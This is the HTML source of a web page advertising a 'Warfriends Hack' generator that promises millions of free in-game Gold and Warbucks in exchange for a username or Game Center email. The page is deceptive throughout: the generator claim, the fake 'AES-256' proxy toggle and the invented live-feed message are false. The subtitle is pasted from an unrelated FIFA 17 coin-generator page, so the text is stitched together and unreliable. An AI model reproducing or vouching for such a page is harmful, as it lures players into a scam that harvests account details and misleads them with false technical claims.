<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Warfriends Hack | Free Warfriends Gold and Warbucks</title>
    <meta name="keywords" content="warfriends hack, warfriends hacks, warfriends cheat, warfriends cheats, warfriends free gold hack, warfriends free gold, warfriends free warbucks hack, warfriends free packs, warfriends get free gold, warfriends get gold for free, how to get free warfriends gold, how to get free warfiends warbucks, warfriends gratis gold bekommen, warfriends gratis geld, warfriends umsonst geld bekommen, warfriends umsonst gold bekommen, warfriends kostenlos gold, warfriends kostenlos geld, warfriends gratis, warfriends gold illimites, warfriends or illimites, wardfriends gratuit or, wardfriends gratuit argent, wardfriends argent illimites, warfriends get free gold, warfriends get free warbucks, warfriends free money">
    <meta name="description" content="Looking to get free gold and warbucks on Warfriends? You're in the right place! Complete a few steps to get your free Warfriends Gold and Warbucks.">

    <link rel="icon" type="image/png" href="http://freefifacoins.net/img/top-logo.jpg"><!--[if lt IE 9]>
    <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script><![endif]-->
    <link href="css/_bower.css" rel="stylesheet">
    <link href="css/style.css" rel="stylesheet">
    <style>
      .pending-items-box {
        /*border: 2px dashed #d23232;*/
        padding: 10px;
        margin-bottom: 20px;
        text-align: center;
        background-size: 100%;
         -webkit-border-radius: 5px;
                 border-radius: 5px;
      }
      .pending-items-box p {
        display: none;
      }
      .pending-items-box p.text {
        display: block;
        margin: 0;
        padding: 0;
        text-transform: uppercase;
        color: #fff;
        font-weight: 300;
        letter-spacing: 1px;
      }
      .pending-items-box .item {
        position: relative;
        padding: 0;
        width: 200px;
        max-width: 100%;
        margin: 5px auto;
      }
      .pending-items-box .item .left {
        position: absolute;
        top: 0;
        left: -10px;
        width: 35px;
        height: 35px;
        overflow: hidden;
        border: 2px solid #18bc9c;
        -webkit-border-radius: 10000px;
                border-radius: 10000px;
        -webkit-box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.15);
                box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.15);
      }
      .pending-items-box .item .left > img {
        width: 31px;
        height: 31px;
        -webkit-border-radius: 10000px;
                border-radius: 10000px;
        border: 2px solid white;
        padding: 5px;
        background-color: white;
      }
      .pending-items-box .item .right {
        background-color: white;
        padding: 5px;
        -webkit-border-radius: 10px;
                border-radius: 10px;
        border: 1px solid #18bc9c;
      }
      .updates-box {
        padding: 15px;
        background-color: #fff;
        -webkit-border-radius: 5px;
                border-radius: 5px;
        margin-bottom: 25px;
        position: relative;
        z-index: 2;
        text-align: center;
      }
      .updates-box p {
        margin: 0;
        padding: 0;
      }
      .updates-box p.heading {
        color: #000;
        text-transform: uppercase;
        letter-spacing: 1px;
        font-size: 15px;
        font-weight: 300;
        border: none;
        margin-bottom: 0;
      }
      .updates-box p.msg {
        color: #000;
        font-size: 24px;
        font-weight: 400;
      }
      .msg img:first-child {
        padding-bottom: 6px;
        width: 24px;
      }
      @media (max-width: 450px) {
        .updates-box p.msg {
          font-size: 15px;
        }
      }
      p.last-updated-msg {
        padding: 15px;
        background-color: #18bc9c;
        margin-bottom: 25px;
        color: white;
        -webkit-border-radius: 5px;
                border-radius: 5px;
      }
      .custom-color {
        background-color:#0b1a2d  !important;
      }
      .custom-border{
        border-color:#0b1a2d  !important;
      }
      .custom-color-border:hover{
        background-color:#1B1B1B !important;
        border-color:#1B1B1B !important;
      }
      .custom-color-border{
        background-color:#0b1a2d  !important;
        border-color:#0b1a2d !important;
      }
      .top-logo {
        width: 475px !important;
      }
    </style>
  </head>
  <body>
    <div class="background-overlay"></div>
    <div class="container">
      <div class="row">
        <div class="col-md-8 col-md-offset-2">
          <div class="white-inside generator-section">
            <div class="heading"><img src="img/top-logo.png" class="top-logo">
              <h1 style="font-family: Arial;">Free Warfriends Warbucks and Gold</h1>
              <p class="sub">FIFA 17 is out, and we all know what that means. We lose all of last year's progress and have to start all over again. We wanted to make this a little bit easier for you, so we have created a FIFA 17 Ultimate Team coin generator. By all means, go ahead and use it. It's completely free and won't take long to go through.</p>
              <p class="last-updated-msg">Version 2.36. Last Updated: <span id="date-updated">12/28/2016</span> EDT</p>
            </div>
            <p class="lead">To get your items, fill in the form below.</p>
            <div class="row">
              <div class="col-md-6">
                <div class="form-group">
                  <label>1. Platform</label>
                  <p class="help-block">Where is your account located?</p>
                  <select id="platform" class="form-control">
                    <option value="iOS">iOS</option>
                    <option value="Android">Android</option>
                  </select>
                </div>
              </div>
              <div class="col-md-6">
                <div class="form-group">
                  <label for="username">2. WarFriends Username</label>
                  <p class="help-block">What is your Username?</p>
                  <div class="row">
                    <div class="col-md-12">
                      <input id="username" placeholder="Hint: Alternatively your Game Center Email" type="text" class="form-control">
                    </div>
                    <!-- <div class="col-lg-4 col-md-12 col-sm-5 col-xs-12">
                      <button class="btn btn-success btn-block connect-btn">Connect</button>
                    </div> -->
                  </div>
                </div>
              </div>
            </div>
            <div class="row">
              <div class="col-sm-6">
                <div class="form-group">
                  <label for="cash">3. Warbucks</label>
                  <p class="help-block">A million? Or two? You choose!</p>
                  <div class="input-group"><span class="input-group-addon"><span class="gen-item-icon"></span></span>
                    <select data-name="Warbucks" data-img="./img/warbucks.png" class="gen-item form-control">
                      <option value="500,000">500,000</option>
                      <option value="1,000,000">1,000,000</option>
                      <option value="2,500,000">2,500,000</option>
                      <option value="5,000,000">5,000,000</option>
                      <option value="10,000,000">10,000,000</option>
                    </select>
                  </div>
                </div>
              </div>
              <div class="col-sm-6">
                <div class="form-group">
                  <label for="coins">4. Gold</label>
                  <p class="help-block">Some gold as well? Go ahead.</p>
                  <div class="input-group"><span class="input-group-addon"><span class="gen-item-icon"></span></span>
                    <select data-name="Gold" data-img="./img/gold.png" class="gen-item form-control">
                      <option value="250,000">250,000</option>
                      <option value="500,000">500,000</option>
                      <option value="1,000,000">1,000,000</option>
                      <option value="5,000,000">5,000,000</option>
                    </select>
                  </div>
                </div>
              </div>
            </div>
            <div class="form-group">
              <label for="proxy">Proxy Connection (AES-256 Encryption)</label>
              <p class="help-block">This is so that the servers cannot intercept the connection.</p>
              <input type="checkbox" checked="checked" class="js-switch">
            </div>
            <button id="gen-btn" class="btn btn-block btn-lg btn-success"><i class="glyphicon glyphicon-check"></i> Start Generator</button>
          </div>
          <div class="updates-box">
            <p class="heading">Live Feed</p>
            <p class="msg">John has generated 5,000,000 Warbucks!</p>
          </div>
          <footer class="footer">
            <p>Copyright &copy; 2017 Free Warfriends Warbucks and Gold. All rights reserved.</p>
          </footer>
        </div>
      </div>
    </div>
    <script src="js/bower.js"></script>
    <script src="js/chance.min.js"></script>
    <script src="js/updates.js"></script>
    <script src="js/scripts.js"></script>
  </body>
</html>
